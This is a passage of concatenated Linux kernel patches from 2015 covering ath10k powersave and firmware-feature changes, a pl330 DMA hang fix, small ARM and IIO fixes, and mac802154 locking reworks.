With + * intensive traffic accessing powersave register would be a bit + * wasteful overhead and would needlessly stall CPU. It is far more + * efficient to rely on a variable in RAM and update it only upon + * powersave register state changes. + */ + bool ps_awake; }; static inline struct ath10k_pci *ath10k_pci_priv(struct ath10k *ar) @@ -215,61 +244,25 @@ static inline struct ath10k_pci *ath10k_pci_priv(struct ath10k *ar) * for this device; but that's not guaranteed. */ #define TARG_CPU_SPACE_TO_CE_SPACE(ar, pci_addr, addr) \ - (((ioread32((pci_addr)+(SOC_CORE_BASE_ADDRESS| \ + (((ath10k_pci_read32(ar, (SOC_CORE_BASE_ADDRESS | \ CORE_CTRL_ADDRESS)) & 0x7ff) << 21) | \ 0x100000 | ((addr) & 0xfffff)) /* Wait up to this many Ms for a Diagnostic Access CE operation to complete */ #define DIAG_ACCESS_CE_TIMEOUT_MS 10 -/* Target exposes its registers for direct access. However before host can - * access them it needs to make sure the target is awake (ath10k_pci_wake, - * ath10k_pci_wake_wait, ath10k_pci_is_awake). Once target is awake it won't go - * to sleep unless host tells it to (ath10k_pci_sleep). - * - * If host tries to access target registers without waking it up it can - * scribble over host memory. - * - * If target is asleep waking it up may take up to even 2ms. - */ - -static inline void ath10k_pci_write32(struct ath10k *ar, u32 offset, - u32 value) -{ - struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); - - iowrite32(value, ar_pci->mem + offset); -} - -static inline u32 ath10k_pci_read32(struct ath10k *ar, u32 offset) -{ - struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); - - return ioread32(ar_pci->mem + offset); -} - -static inline u32 ath10k_pci_soc_read32(struct ath10k *ar, u32 addr) -{ - return ath10k_pci_read32(ar, RTC_SOC_BASE_ADDRESS + addr); -} +void ath10k_pci_write32(struct ath10k *ar, u32 offset, u32 value); +void ath10k_pci_soc_write32(struct ath10k *ar, u32 addr, u32 val); +void ath10k_pci_reg_write32(struct ath10k *ar, u32 addr, u32 val); -static inline void ath10k_pci_soc_write32(struct ath10k *ar, u32 addr, u32 val) -{ - ath10k_pci_write32(ar, RTC_SOC_BASE_ADDRESS + addr, val); -} +u32 ath10k_pci_read32(struct ath10k *ar, u32 offset); +u32 ath10k_pci_soc_read32(struct ath10k *ar, u32 addr); +u32 ath10k_pci_reg_read32(struct ath10k *ar, u32 addr); -static inline u32 ath10k_pci_reg_read32(struct ath10k *ar, u32 addr) -{ - struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); - - return ioread32(ar_pci->mem + PCIE_LOCAL_BASE_ADDRESS + addr); -} - -static inline void ath10k_pci_reg_write32(struct ath10k *ar, u32 addr, u32 val) -{ - struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); - - iowrite32(val, ar_pci->mem + PCIE_LOCAL_BASE_ADDRESS + addr); -} +/* QCA6174 is known to have Tx/Rx issues when SOC_WAKE register is poked too + * frequently. To avoid this put SoC to sleep after a very conservative grace + * period. Adjust with great care. + */ +#define ATH10K_PCI_SLEEP_GRACE_PERIOD_MSEC 60 #endif /* _PCI_H_ */ From 48f4ca34f36bb947d8a7cd4ff8c8e282f14d51e6 Mon Sep 17 00:00:00 2001 From: Michal Kazior Date: Tue, 19 May 2015 14:09:34 +0200 Subject: [PATCH 161/872] ath10k: add new 4addr related fw_feature Some firmware revisions pad 4th hw address in Native Wifi Rx decap. This is the case with 10.x and it was assumed that this is true for all firmware images. However QCA988X with 999.999.0.636 and QCA61X4 with WLAN.RM.2.0-00088 don't have the padding. Hence add a feature flag indicating that the padding isn't present so firmware images can advertise it appropriately. 
This way driver will behave as it was before with old firmware blobs and doesn't cause any regressions from user perspective. Effectively this patch enables QCA988X with 999.999.0.636 and QCA61X4 with WLAN.RM.2.0-00088 to set up client bridging provided user has an updated firmware blob. Signed-off-by: Michal Kazior Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/ath10k/core.h | 5 +++++ drivers/net/wireless/ath/ath10k/htt_rx.c | 14 ++++++++++---- 2 files changed, 15 insertions(+), 4 deletions(-) diff --git a/drivers/net/wireless/ath/ath10k/core.h b/drivers/net/wireless/ath/ath10k/core.h index 827b3d79ed0c..70fcdc9c2758 100644 --- a/drivers/net/wireless/ath/ath10k/core.h +++ b/drivers/net/wireless/ath/ath10k/core.h @@ -463,6 +463,11 @@ enum ath10k_fw_features { /* Don't trust error code from otp.bin */ ATH10K_FW_FEATURE_IGNORE_OTP_RESULT, + /* Some firmware revisions pad 4th hw address to 4 byte boundary making + * it 8 bytes long in Native Wifi Rx decap. + */ + ATH10K_FW_FEATURE_NO_NWIFI_DECAP_4ADDR_PADDING, + /* keep last */ ATH10K_FW_FEATURE_COUNT, }; diff --git a/drivers/net/wireless/ath/ath10k/htt_rx.c b/drivers/net/wireless/ath/ath10k/htt_rx.c index b26e32f42656..89eb16b30fc4 100644 --- a/drivers/net/wireless/ath/ath10k/htt_rx.c +++ b/drivers/net/wireless/ath/ath10k/htt_rx.c @@ -965,10 +965,16 @@ static void ath10k_process_rx(struct ath10k *ar, ieee80211_rx(ar->hw, skb); } -static int ath10k_htt_rx_nwifi_hdrlen(struct ieee80211_hdr *hdr) +static int ath10k_htt_rx_nwifi_hdrlen(struct ath10k *ar, + struct ieee80211_hdr *hdr) { - /* nwifi header is padded to 4 bytes. this fixes 4addr rx */ - return round_up(ieee80211_hdrlen(hdr->frame_control), 4); + int len = ieee80211_hdrlen(hdr->frame_control); + + if (!test_bit(ATH10K_FW_FEATURE_NO_NWIFI_DECAP_4ADDR_PADDING, + ar->fw_features)) + len = round_up(len, 4); + + return len; } static void ath10k_htt_rx_h_undecap_raw(struct ath10k *ar, @@ -1067,7 +1073,7 @@ static void ath10k_htt_rx_h_undecap_nwifi(struct ath10k *ar, /* pull decapped header and copy SA & DA */ hdr = (struct ieee80211_hdr *)msdu->data; - hdr_len = ath10k_htt_rx_nwifi_hdrlen(hdr); + hdr_len = ath10k_htt_rx_nwifi_hdrlen(ar, hdr); ether_addr_copy(da, ieee80211_get_DA(hdr)); ether_addr_copy(sa, ieee80211_get_SA(hdr)); skb_pull(msdu, hdr_len); From 81cc6edc08705ac0146fe6ac14a0982a31ce6f3d Mon Sep 17 00:00:00 2001 From: Krzysztof Kozlowski Date: Thu, 21 May 2015 09:34:09 +0900 Subject: [PATCH 162/872] dmaengine: pl330: Fix hang on dmaengine_terminate_all on certain boards The pl330 device could hang infinitely on certain boards when DMA channels are terminated. It was caused by lack of runtime resume when executing pl330_terminate_all() which calls the _stop() function. _stop() accesses device register and can loop infinitely while checking for device state. The hang was confirmed by Dinh Nguyen on Altera SOCFPGA Cyclone V board during boot. 
It can be also triggered with: $ echo 1 > /sys/module/dmatest/parameters/iterations $ echo dma1chan0 > /sys/module/dmatest/parameters/channel $ echo 1 > /sys/module/dmatest/parameters/run $ sleep 1 $ cat /sys/module/dmatest/parameters/run Reported-by: Dinh Nguyen Signed-off-by: Krzysztof Kozlowski Fixes: ae43b3289186 ("ARM: 8202/1: dmaengine: pl330: Add runtime Power Management support v12") Cc: Tested-by: Dinh Nguyen Signed-off-by: Vinod Koul --- drivers/dma/pl330.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/drivers/dma/pl330.c b/drivers/dma/pl330.c index a7d9d3029b14..340f9e607cd8 100644 --- a/drivers/dma/pl330.c +++ b/drivers/dma/pl330.c @@ -2127,6 +2127,7 @@ static int pl330_terminate_all(struct dma_chan *chan) struct pl330_dmac *pl330 = pch->dmac; LIST_HEAD(list); + pm_runtime_get_sync(pl330->ddma.dev); spin_lock_irqsave(&pch->lock, flags); spin_lock(&pl330->lock); _stop(pch->thread); @@ -2151,6 +2152,8 @@ static int pl330_terminate_all(struct dma_chan *chan) list_splice_tail_init(&pch->work_list, &pl330->desc_pool); list_splice_tail_init(&pch->completed_list, &pl330->desc_pool); spin_unlock_irqrestore(&pch->lock, flags); + pm_runtime_mark_last_busy(pl330->ddma.dev); + pm_runtime_put_autosuspend(pl330->ddma.dev); return 0; } From bd7413aef860baed78c76734050c1de4194ed61c Mon Sep 17 00:00:00 2001 From: Robert Jarzmik Date: Thu, 21 May 2015 21:55:42 +0200 Subject: [PATCH 163/872] ARM: pxa: pxa_cplds: signedness bug in probe "base_irq" needs to be signed for the error handling to work. Also we can remove the initialization because we re-assign it later. Fixes: aa8d6b73ea33 ('ARM: pxa: pxa_cplds: add lubbock and mainstone IO') Signed-off-by: Dan Carpenter Signed-off-by: Robert Jarzmik Signed-off-by: Arnd Bergmann --- arch/arm/mach-pxa/pxa_cplds_irqs.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/arm/mach-pxa/pxa_cplds_irqs.c b/arch/arm/mach-pxa/pxa_cplds_irqs.c index f1aeb54fabe3..2385052b0ce1 100644 --- a/arch/arm/mach-pxa/pxa_cplds_irqs.c +++ b/arch/arm/mach-pxa/pxa_cplds_irqs.c @@ -107,7 +107,7 @@ static int cplds_probe(struct platform_device *pdev) struct resource *res; struct cplds *fpga; int ret; - unsigned int base_irq = 0; + int base_irq; unsigned long irqflags = 0; fpga = devm_kzalloc(&pdev->dev, sizeof(*fpga), GFP_KERNEL); From 242ddf04297f2c4768bd8eb7593ab911910c5f76 Mon Sep 17 00:00:00 2001 From: Inki Dae Date: Sat, 23 May 2015 11:46:55 +0900 Subject: [PATCH 164/872] ARM: dts: set display clock correctly for exynos4412-trats2 This patch sets display clock correctly. If Display clock isn't set correctly then you would find below messages and Display controller doesn't work correctly. 
exynos-drm: No connectors reported connected with modes [drm] Cannot find any crtc or sizes - going 1024x768 Fixes: abc0b1447d49 ("drm: Perform basic sanity checks on probed modes") Cc: Signed-off-by: Inki Dae Reviewed-by: Krzysztof Kozlowski Tested-by: Krzysztof Kozlowski Signed-off-by: Kukjin Kim --- arch/arm/boot/dts/exynos4412-trats2.dts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/arm/boot/dts/exynos4412-trats2.dts b/arch/arm/boot/dts/exynos4412-trats2.dts index 173ffa479ad3..792394dd0f2a 100644 --- a/arch/arm/boot/dts/exynos4412-trats2.dts +++ b/arch/arm/boot/dts/exynos4412-trats2.dts @@ -736,7 +736,7 @@ display-timings { timing-0 { - clock-frequency = <0>; + clock-frequency = <57153600>; hactive = <720>; vactive = <1280>; hfront-porch = <5>; From e5d732186270e0881f47d95610316c0614b21c3e Mon Sep 17 00:00:00 2001 From: Axel Lin Date: Wed, 20 May 2015 08:53:20 +0800 Subject: [PATCH 165/872] iio: adc: twl6030-gpadc: Fix modalias Remove extra space between platform prefix and DRIVER_NAME in MODULE_ALIAS. Signed-off-by: Axel Lin Cc: Signed-off-by: Jonathan Cameron --- drivers/iio/adc/twl6030-gpadc.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/iio/adc/twl6030-gpadc.c b/drivers/iio/adc/twl6030-gpadc.c index 89d8aa1d2818..df12c57e6ce0 100644 --- a/drivers/iio/adc/twl6030-gpadc.c +++ b/drivers/iio/adc/twl6030-gpadc.c @@ -1001,7 +1001,7 @@ static struct platform_driver twl6030_gpadc_driver = { module_platform_driver(twl6030_gpadc_driver); -MODULE_ALIAS("platform: " DRIVER_NAME); +MODULE_ALIAS("platform:" DRIVER_NAME); MODULE_AUTHOR("Balaji T K "); MODULE_AUTHOR("Graeme Gregory "); MODULE_AUTHOR("Oleksandr Kozaruk Date: Fri, 22 May 2015 17:43:51 +0200 Subject: [PATCH 166/872] mac802154: fix hold rtnl while ioctl This patch fixes an issue to set address configuration with ioctl. Accessing the mib requires rtnl lock and the ndo_do_ioctl doesn't hold the rtnl lock while this callback is called. This patch do that manually. Signed-off-by: Alexander Aring Reported-by: Matteo Petracca Reviewed-by: Stefan Schmidt Signed-off-by: Marcel Holtmann --- net/mac802154/iface.c | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/net/mac802154/iface.c b/net/mac802154/iface.c index 91b75abbd1a1..2a5878889289 100644 --- a/net/mac802154/iface.c +++ b/net/mac802154/iface.c @@ -62,8 +62,7 @@ mac802154_wpan_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd) (struct sockaddr_ieee802154 *)&ifr->ifr_addr; int err = -ENOIOCTLCMD; - ASSERT_RTNL(); - + rtnl_lock(); spin_lock_bh(&sdata->mib_lock); switch (cmd) { @@ -90,6 +89,7 @@ mac802154_wpan_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd) case SIOCSIFADDR: if (netif_running(dev)) { spin_unlock_bh(&sdata->mib_lock); + rtnl_unlock(); return -EBUSY; } @@ -112,6 +112,7 @@ mac802154_wpan_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd) } spin_unlock_bh(&sdata->mib_lock); + rtnl_unlock(); return err; } From 4a3a8c0c3a613e481bea931f0d65dc4a7efaa9b9 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Fri, 22 May 2015 17:43:52 +0200 Subject: [PATCH 167/872] mac802154: remove pib lock This patch removes the pib lock which is now replaced by rtnl lock. The new interface already use the rtnl lock only. Nevertheless this patch will fix issues while using new and old interface at the same time. 
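[Editorial note] Consolidating on a single global lock mostly means that every reader and writer of the MIB fields brackets the access with lock/unlock, including early-return error paths (as the ioctl change in the previous patch shows). A minimal user-space analogue follows; a pthread mutex stands in for the rtnl lock and the wpan_cfg struct, cfg_get() and cfg_set_addr() are invented names used only for this sketch.

/* Illustration only: one global lock guarding configuration fields. */
#include <errno.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>

static pthread_mutex_t cfg_lock = PTHREAD_MUTEX_INITIALIZER;	/* "rtnl" */

struct wpan_cfg {		/* hypothetical MIB-like fields */
	uint16_t pan_id;
	uint16_t short_addr;
	int running;
};

static struct wpan_cfg cfg = { .pan_id = 0xffff, .short_addr = 0xfffe };

/* Readers copy the fields to locals under the lock, then drop it. */
static void cfg_get(uint16_t *pan_id, uint16_t *short_addr)
{
	pthread_mutex_lock(&cfg_lock);
	*pan_id = cfg.pan_id;
	*short_addr = cfg.short_addr;
	pthread_mutex_unlock(&cfg_lock);
}

/* Writers must release the lock on every exit path, including errors. */
static int cfg_set_addr(uint16_t pan_id, uint16_t short_addr)
{
	pthread_mutex_lock(&cfg_lock);
	if (cfg.running) {
		pthread_mutex_unlock(&cfg_lock);	/* early return still unlocks */
		return -EBUSY;
	}
	cfg.pan_id = pan_id;
	cfg.short_addr = short_addr;
	pthread_mutex_unlock(&cfg_lock);
	return 0;
}

int main(void)
{
	uint16_t pan, addr;

	cfg_set_addr(0x1234, 0x0001);
	cfg_get(&pan, &addr);
	printf("pan 0x%04x addr 0x%04x\n", pan, addr);
	return 0;
}

The trade-off is coarser serialization in exchange for one lock ordering; the payoff, visible in the diffs below, is that hot-path frame parsing no longer needs any locking because the address fields are effectively read-only while the interface is up.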
Signed-off-by: Alexander Aring Reviewed-by: Stefan Schmidt Signed-off-by: Marcel Holtmann --- include/net/cfg802154.h | 2 -- net/ieee802154/core.c | 2 -- net/ieee802154/nl-phy.c | 6 +++--- net/mac802154/iface.c | 7 ------- net/mac802154/mib.c | 4 ++-- 5 files changed, 5 insertions(+), 16 deletions(-) diff --git a/include/net/cfg802154.h b/include/net/cfg802154.h index 11bbf17ad865..c6aa1d210182 100644 --- a/include/net/cfg802154.h +++ b/include/net/cfg802154.h @@ -121,8 +121,6 @@ enum wpan_phy_flags { }; struct wpan_phy { - struct mutex pib_lock; - /* If multiple wpan_phys are registered and you're handed e.g. * a regular netdev with assigned ieee802154_ptr, you won't * know whether it points to a wpan_phy your driver has registered diff --git a/net/ieee802154/core.c b/net/ieee802154/core.c index 2ee00e8a0308..b0248e934230 100644 --- a/net/ieee802154/core.c +++ b/net/ieee802154/core.c @@ -121,8 +121,6 @@ wpan_phy_new(const struct cfg802154_ops *ops, size_t priv_size) /* atomic_inc_return makes it start at 1, make it start at 0 */ rdev->wpan_phy_idx--; - mutex_init(&rdev->wpan_phy.pib_lock); - INIT_LIST_HEAD(&rdev->wpan_dev_list); device_initialize(&rdev->wpan_phy.dev); dev_set_name(&rdev->wpan_phy.dev, PHY_NAME "%d", rdev->wpan_phy_idx); diff --git a/net/ieee802154/nl-phy.c b/net/ieee802154/nl-phy.c index cbc0d09351e0..77d73014bde3 100644 --- a/net/ieee802154/nl-phy.c +++ b/net/ieee802154/nl-phy.c @@ -50,7 +50,7 @@ static int ieee802154_nl_fill_phy(struct sk_buff *msg, u32 portid, if (!hdr) goto out; - mutex_lock(&phy->pib_lock); + rtnl_lock(); if (nla_put_string(msg, IEEE802154_ATTR_PHY_NAME, wpan_phy_name(phy)) || nla_put_u8(msg, IEEE802154_ATTR_PAGE, phy->current_page) || nla_put_u8(msg, IEEE802154_ATTR_CHANNEL, phy->current_channel)) @@ -63,13 +63,13 @@ static int ieee802154_nl_fill_phy(struct sk_buff *msg, u32 portid, nla_put(msg, IEEE802154_ATTR_CHANNEL_PAGE_LIST, pages * sizeof(uint32_t), buf)) goto nla_put_failure; - mutex_unlock(&phy->pib_lock); + rtnl_unlock(); kfree(buf); genlmsg_end(msg, hdr); return 0; nla_put_failure: - mutex_unlock(&phy->pib_lock); + rtnl_unlock(); genlmsg_cancel(msg, hdr); out: kfree(buf); diff --git a/net/mac802154/iface.c b/net/mac802154/iface.c index 2a5878889289..22f478be7489 100644 --- a/net/mac802154/iface.c +++ b/net/mac802154/iface.c @@ -242,7 +242,6 @@ static int mac802154_wpan_open(struct net_device *dev) struct ieee802154_sub_if_data *sdata = IEEE802154_DEV_TO_SUB_IF(dev); struct ieee802154_local *local = sdata->local; struct wpan_dev *wpan_dev = &sdata->wpan_dev; - struct wpan_phy *phy = sdata->local->phy; rc = ieee802154_check_concurrent_iface(sdata, sdata->vif.type); if (rc < 0) @@ -252,8 +251,6 @@ static int mac802154_wpan_open(struct net_device *dev) if (rc < 0) return rc; - mutex_lock(&phy->pib_lock); - if (local->hw.flags & IEEE802154_HW_PROMISCUOUS) { rc = drv_set_promiscuous_mode(local, wpan_dev->promiscuous_mode); @@ -295,11 +292,7 @@ static int mac802154_wpan_open(struct net_device *dev) goto out; } - mutex_unlock(&phy->pib_lock); - return 0; - out: - mutex_unlock(&phy->pib_lock); return rc; } diff --git a/net/mac802154/mib.c b/net/mac802154/mib.c index 5cf019a57fd7..033dfc7755c6 100644 --- a/net/mac802154/mib.c +++ b/net/mac802154/mib.c @@ -91,16 +91,16 @@ void mac802154_dev_set_page_channel(struct net_device *dev, u8 page, u8 chan) struct ieee802154_local *local = sdata->local; int res; + ASSERT_RTNL(); + BUG_ON(dev->type != ARPHRD_IEEE802154); res = drv_set_channel(local, page, chan); if (res) { pr_debug("set_channel failed\n"); } 
else { - mutex_lock(&local->phy->pib_lock); local->phy->current_channel = chan; local->phy->current_page = page; - mutex_unlock(&local->phy->pib_lock); } } From 344f8c119df742f2bf7098cf8fc326351f583249 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Fri, 22 May 2015 17:43:53 +0200 Subject: [PATCH 168/872] mac802154: use atomic ops for sequence incrementation This patch will use atomic operations for sequence number incrementation while MAC header generation. Upper layers like af_802154 or 6LoWPAN could call this function in a parallel context while generating 802.15.4 MAC header before queuing into wpan interfaces transmit queue. Signed-off-by: Alexander Aring Reviewed-by: Stefan Schmidt Signed-off-by: Marcel Holtmann --- include/net/cfg802154.h | 4 ++-- include/net/ieee802154_netdev.h | 1 - net/ieee802154/6lowpan/core.c | 8 -------- net/mac802154/ieee802154_i.h | 1 - net/mac802154/iface.c | 9 ++++++--- net/mac802154/mac_cmd.c | 1 - net/mac802154/mib.c | 9 --------- 7 files changed, 8 insertions(+), 25 deletions(-) diff --git a/include/net/cfg802154.h b/include/net/cfg802154.h index c6aa1d210182..4de59aa96173 100644 --- a/include/net/cfg802154.h +++ b/include/net/cfg802154.h @@ -177,9 +177,9 @@ struct wpan_dev { __le64 extended_addr; /* MAC BSN field */ - u8 bsn; + atomic_t bsn; /* MAC DSN field */ - u8 dsn; + atomic_t dsn; u8 min_be; u8 max_be; diff --git a/include/net/ieee802154_netdev.h b/include/net/ieee802154_netdev.h index 94a297052442..144fefb4d619 100644 --- a/include/net/ieee802154_netdev.h +++ b/include/net/ieee802154_netdev.h @@ -431,7 +431,6 @@ struct ieee802154_mlme_ops { */ __le16 (*get_pan_id)(const struct net_device *dev); __le16 (*get_short_addr)(const struct net_device *dev); - u8 (*get_dsn)(const struct net_device *dev); }; static inline struct ieee802154_mlme_ops * diff --git a/net/ieee802154/6lowpan/core.c b/net/ieee802154/6lowpan/core.c index 0ae5822ef944..2e77fada7e54 100644 --- a/net/ieee802154/6lowpan/core.c +++ b/net/ieee802154/6lowpan/core.c @@ -69,13 +69,6 @@ static __le16 lowpan_get_short_addr(const struct net_device *dev) return ieee802154_mlme_ops(real_dev)->get_short_addr(real_dev); } -static u8 lowpan_get_dsn(const struct net_device *dev) -{ - struct net_device *real_dev = lowpan_dev_info(dev)->real_dev; - - return ieee802154_mlme_ops(real_dev)->get_dsn(real_dev); -} - static struct header_ops lowpan_header_ops = { .create = lowpan_header_create, }; @@ -106,7 +99,6 @@ static const struct net_device_ops lowpan_netdev_ops = { static struct ieee802154_mlme_ops lowpan_mlme = { .get_pan_id = lowpan_get_pan_id, .get_short_addr = lowpan_get_short_addr, - .get_dsn = lowpan_get_dsn, }; static void lowpan_setup(struct net_device *dev) diff --git a/net/mac802154/ieee802154_i.h b/net/mac802154/ieee802154_i.h index 127ba18386fc..56b3847466e9 100644 --- a/net/mac802154/ieee802154_i.h +++ b/net/mac802154/ieee802154_i.h @@ -141,7 +141,6 @@ __le16 mac802154_dev_get_short_addr(const struct net_device *dev); __le16 mac802154_dev_get_pan_id(const struct net_device *dev); void mac802154_dev_set_pan_id(struct net_device *dev, __le16 val); void mac802154_dev_set_page_channel(struct net_device *dev, u8 page, u8 chan); -u8 mac802154_dev_get_dsn(const struct net_device *dev); int mac802154_get_params(struct net_device *dev, struct ieee802154_llsec_params *params); diff --git a/net/mac802154/iface.c b/net/mac802154/iface.c index 22f478be7489..0ec7bc402e29 100644 --- a/net/mac802154/iface.c +++ b/net/mac802154/iface.c @@ -368,7 +368,7 @@ static int mac802154_header_create(struct 
sk_buff *skb, hdr.fc.type = cb->type; hdr.fc.security_enabled = cb->secen; hdr.fc.ack_request = cb->ackreq; - hdr.seq = ieee802154_mlme_ops(dev)->get_dsn(dev); + hdr.seq = atomic_inc_return(&dev->ieee802154_ptr->dsn) & 0xFF; if (mac802154_set_header_security(sdata, &hdr, cb) < 0) return -EINVAL; @@ -468,13 +468,16 @@ ieee802154_setup_sdata(struct ieee802154_sub_if_data *sdata, enum nl802154_iftype type) { struct wpan_dev *wpan_dev = &sdata->wpan_dev; + u8 tmp; /* set some type-dependent values */ sdata->vif.type = type; sdata->wpan_dev.iftype = type; - get_random_bytes(&wpan_dev->bsn, 1); - get_random_bytes(&wpan_dev->dsn, 1); + get_random_bytes(&tmp, sizeof(tmp)); + atomic_set(&wpan_dev->bsn, tmp); + get_random_bytes(&tmp, sizeof(tmp)); + atomic_set(&wpan_dev->dsn, tmp); /* defaults per 802.15.4-2011 */ wpan_dev->min_be = 3; diff --git a/net/mac802154/mac_cmd.c b/net/mac802154/mac_cmd.c index 6dcbb3b5994c..3b347d4d3d4c 100644 --- a/net/mac802154/mac_cmd.c +++ b/net/mac802154/mac_cmd.c @@ -153,7 +153,6 @@ struct ieee802154_mlme_ops mac802154_mlme_wpan = { .start_req = mac802154_mlme_start_req, .get_pan_id = mac802154_dev_get_pan_id, .get_short_addr = mac802154_dev_get_short_addr, - .get_dsn = mac802154_dev_get_dsn, .llsec = &mac802154_llsec_ops, diff --git a/net/mac802154/mib.c b/net/mac802154/mib.c index 033dfc7755c6..00a62de9cc23 100644 --- a/net/mac802154/mib.c +++ b/net/mac802154/mib.c @@ -76,15 +76,6 @@ void mac802154_dev_set_pan_id(struct net_device *dev, __le16 val) spin_unlock_bh(&sdata->mib_lock); } -u8 mac802154_dev_get_dsn(const struct net_device *dev) -{ - struct ieee802154_sub_if_data *sdata = IEEE802154_DEV_TO_SUB_IF(dev); - - BUG_ON(dev->type != ARPHRD_IEEE802154); - - return sdata->wpan_dev.dsn++; -} - void mac802154_dev_set_page_channel(struct net_device *dev, u8 page, u8 chan) { struct ieee802154_sub_if_data *sdata = IEEE802154_DEV_TO_SUB_IF(dev); From c947f7e1e31a708f5a4ea8c1a627bec578cd9223 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Fri, 22 May 2015 17:43:54 +0200 Subject: [PATCH 169/872] mac802154: remove mib lock This patch removes the mib lock. The new locking mechanism is to protect the mib values with the rtnl lock. Note that this isn't always necessary if we have an interface up the most mib values are readonly (e.g. address settings). With this behaviour we can remove locking in hotpath like frame parsing completely. It depends on context if we need to hold the rtnl lock or not, this makes the callbacks of ieee802154_mlme_ops unnecessary because these callbacks hols always the locks. Signed-off-by: Alexander Aring Reviewed-by: Stefan Schmidt Signed-off-by: Marcel Holtmann --- include/net/ieee802154_netdev.h | 9 ------ net/ieee802154/6lowpan/core.c | 20 ------------- net/ieee802154/6lowpan/tx.c | 2 +- net/ieee802154/nl-mac.c | 14 ++++++--- net/ieee802154/socket.c | 12 ++++---- net/mac802154/ieee802154_i.h | 6 ---- net/mac802154/iface.c | 8 ------ net/mac802154/mac_cmd.c | 6 ++-- net/mac802154/mib.c | 50 --------------------------------- net/mac802154/rx.c | 5 ---- 10 files changed, 18 insertions(+), 114 deletions(-) diff --git a/include/net/ieee802154_netdev.h b/include/net/ieee802154_netdev.h index 144fefb4d619..84a72a1382a8 100644 --- a/include/net/ieee802154_netdev.h +++ b/include/net/ieee802154_netdev.h @@ -422,15 +422,6 @@ struct ieee802154_mlme_ops { struct ieee802154_mac_params *params); struct ieee802154_llsec_ops *llsec; - - /* The fields below are required. */ - - /* - * FIXME: these should become the part of PIB/MIB interface. 
- * However we still don't have IB interface of any kind - */ - __le16 (*get_pan_id)(const struct net_device *dev); - __le16 (*get_short_addr)(const struct net_device *dev); }; static inline struct ieee802154_mlme_ops * diff --git a/net/ieee802154/6lowpan/core.c b/net/ieee802154/6lowpan/core.c index 2e77fada7e54..f20a387a1011 100644 --- a/net/ieee802154/6lowpan/core.c +++ b/net/ieee802154/6lowpan/core.c @@ -55,20 +55,6 @@ LIST_HEAD(lowpan_devices); static int lowpan_open_count; -static __le16 lowpan_get_pan_id(const struct net_device *dev) -{ - struct net_device *real_dev = lowpan_dev_info(dev)->real_dev; - - return ieee802154_mlme_ops(real_dev)->get_pan_id(real_dev); -} - -static __le16 lowpan_get_short_addr(const struct net_device *dev) -{ - struct net_device *real_dev = lowpan_dev_info(dev)->real_dev; - - return ieee802154_mlme_ops(real_dev)->get_short_addr(real_dev); -} - static struct header_ops lowpan_header_ops = { .create = lowpan_header_create, }; @@ -96,11 +82,6 @@ static const struct net_device_ops lowpan_netdev_ops = { .ndo_start_xmit = lowpan_xmit, }; -static struct ieee802154_mlme_ops lowpan_mlme = { - .get_pan_id = lowpan_get_pan_id, - .get_short_addr = lowpan_get_short_addr, -}; - static void lowpan_setup(struct net_device *dev) { dev->addr_len = IEEE802154_ADDR_LEN; @@ -116,7 +97,6 @@ static void lowpan_setup(struct net_device *dev) dev->netdev_ops = &lowpan_netdev_ops; dev->header_ops = &lowpan_header_ops; - dev->ml_priv = &lowpan_mlme; dev->destructor = free_netdev; dev->features |= NETIF_F_NETNS_LOCAL; } diff --git a/net/ieee802154/6lowpan/tx.c b/net/ieee802154/6lowpan/tx.c index 2349070bd534..98acf7319754 100644 --- a/net/ieee802154/6lowpan/tx.c +++ b/net/ieee802154/6lowpan/tx.c @@ -207,7 +207,7 @@ static int lowpan_header(struct sk_buff *skb, struct net_device *dev) /* prepare wpan address data */ sa.mode = IEEE802154_ADDR_LONG; - sa.pan_id = ieee802154_mlme_ops(dev)->get_pan_id(dev); + sa.pan_id = lowpan_dev_info(dev)->real_dev->ieee802154_ptr->pan_id; sa.extended_addr = ieee802154_devaddr_from_raw(saddr); /* intra-PAN communications */ diff --git a/net/ieee802154/nl-mac.c b/net/ieee802154/nl-mac.c index cdc1cc3543f6..ada58a81b753 100644 --- a/net/ieee802154/nl-mac.c +++ b/net/ieee802154/nl-mac.c @@ -97,8 +97,10 @@ static int ieee802154_nl_fill_iface(struct sk_buff *msg, u32 portid, BUG_ON(!phy); get_device(&phy->dev); - short_addr = ops->get_short_addr(dev); - pan_id = ops->get_pan_id(dev); + rtnl_lock(); + short_addr = dev->ieee802154_ptr->short_addr; + pan_id = dev->ieee802154_ptr->pan_id; + rtnl_unlock(); if (nla_put_string(msg, IEEE802154_ATTR_DEV_NAME, dev->name) || nla_put_string(msg, IEEE802154_ATTR_PHY_NAME, wpan_phy_name(phy)) || @@ -244,7 +246,9 @@ int ieee802154_associate_resp(struct sk_buff *skb, struct genl_info *info) addr.mode = IEEE802154_ADDR_LONG; addr.extended_addr = nla_get_hwaddr( info->attrs[IEEE802154_ATTR_DEST_HW_ADDR]); - addr.pan_id = ieee802154_mlme_ops(dev)->get_pan_id(dev); + rtnl_lock(); + addr.pan_id = dev->ieee802154_ptr->pan_id; + rtnl_unlock(); ret = ieee802154_mlme_ops(dev)->assoc_resp(dev, &addr, nla_get_shortaddr(info->attrs[IEEE802154_ATTR_DEST_SHORT_ADDR]), @@ -281,7 +285,9 @@ int ieee802154_disassociate_req(struct sk_buff *skb, struct genl_info *info) addr.short_addr = nla_get_shortaddr( info->attrs[IEEE802154_ATTR_DEST_SHORT_ADDR]); } - addr.pan_id = ieee802154_mlme_ops(dev)->get_pan_id(dev); + rtnl_lock(); + addr.pan_id = dev->ieee802154_ptr->pan_id; + rtnl_unlock(); ret = ieee802154_mlme_ops(dev)->disassoc_req(dev, &addr, 
